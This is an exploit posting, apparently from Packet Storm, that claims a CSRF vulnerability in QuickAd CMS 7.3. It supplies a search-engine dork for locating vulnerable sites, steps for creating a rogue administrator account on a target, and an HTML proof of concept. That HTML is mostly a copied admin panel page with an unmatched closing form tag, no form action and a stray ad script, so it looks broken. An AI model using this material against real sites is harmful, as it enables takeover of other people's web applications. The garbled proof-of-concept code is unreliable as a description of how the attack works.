Share
## https://sploitus.com/exploit?id=PACKETSTORM:172931
====================================================================================================================================  
| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |   
| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 |   
| # Dork : "Bylancer, All right reserved" |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 61.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /admin/panel/admin_add.php .   
  
[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php .  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
  
<!-- Google fonts -->  
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" />  
  
<!-- Page JS Plugins CSS -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" />  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" />  
<!-- css select2 -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" />  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" />  
<!-- Zeunix CSS stylesheets -->  
<link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" />  
<link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" />  
<link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" />  
<link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" />  
<link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" />  
<link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" />  
<!-- End Stylesheets -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" />  
  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css">  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css">  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" />  
  
  
<!--alerts CSS -->  
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css">  
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css">  
  
<script>  
var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';  
</script>  
</head>  
  
<body class="app-ui layout-has-drawer layout-has-fixed-header">  
  
<div class="app-layout-canvas">  
<div class="app-layout-container">  
  
  
<aside class="app-layout-drawer">  
  
<!-- Drawer scroll area -->  
<div class="app-layout-drawer-scroll">  
<!-- Drawer logo -->  
<div id="logo" class="drawer-header">  
  
  
<main class="app-layout-content">  
  
<!-- Page Content -->  
<div class="container-fluid p-y-md">  
<!-- Partial Table -->  
<div class="card">  
<div class="card-header">  
<h4>Admin users</h4>  
<div class="pull-right">  
<a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a>  
</div>  
</div>  
<div class="card-block">  
<div id="js-table-list">  
<table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable">  
<thead>  
<tr>  
<th class="text-center w-5 sortingNone">  
<label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0">  
<input type="checkbox" id="check-all" name="check-all"><span></span>  
</label>  
</th>  
<th><i class="ion-image"></i> Admin user</th>  
<th class="w-10">Email</th>  
<th style="width: 60px;">Actions</th>  
</tr>  
</thead>  
<tbody id="ajax-services">  
  
</tbody>  
</table>  
  
</div>  
  
  
</div>  
<!-- .card-block -->  
</div>  
<!-- .card -->  
<!-- End Partial Table -->  
  
</div>  
<!-- .container-fluid -->  
<!-- End Page Content -->  
  
</main>  
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<div class="site-action">  
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>  
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">  
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>  
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>  
</button>  
<div class="site-action-buttons">  
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"  
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">  
<i class="icon ion-android-delete" aria-hidden="true"></i>  
</button>  
</div>  
</div>  
  
<div class="col-md-12">  
<!-- Site Action -->  
<div class="site-action">  
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>  
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">  
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>  
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>  
</button>  
<div class="site-action-buttons">  
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"  
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">  
<i class="icon ion-android-delete" aria-hidden="true"></i>  
</button>  
</div>  
</div>  
  
<div class="form-group">  
<label for="exampleInputfullname">Full Name<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-person"></i></div>  
<input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required="">  
<span class="help-block"></span>  
</div>  
</div>  
</div>  
  
<h4 class="box-title">User Login Details</h4>  
<hr>  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputuname">Username<code>*</code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-person"></i></div>  
<input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required="">  
</div>  
</div>  
</div>  
  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputEmail1">Email address<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-android-mail"></i></div>  
<input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required="">  
</div>  
</div>  
</div>  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputpwd1">Password<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-android-lock"></i></div>  
<input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required="">  
</div>  
</div>  
</div>  
</div>  
  
<div class="row">  
  
</div>  
  
  
  
</div>  
  
</form>  
</div>  
</div>  
</div>  
<!-- /.row -->  
</div>  
</div>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
=======================================================================================================================================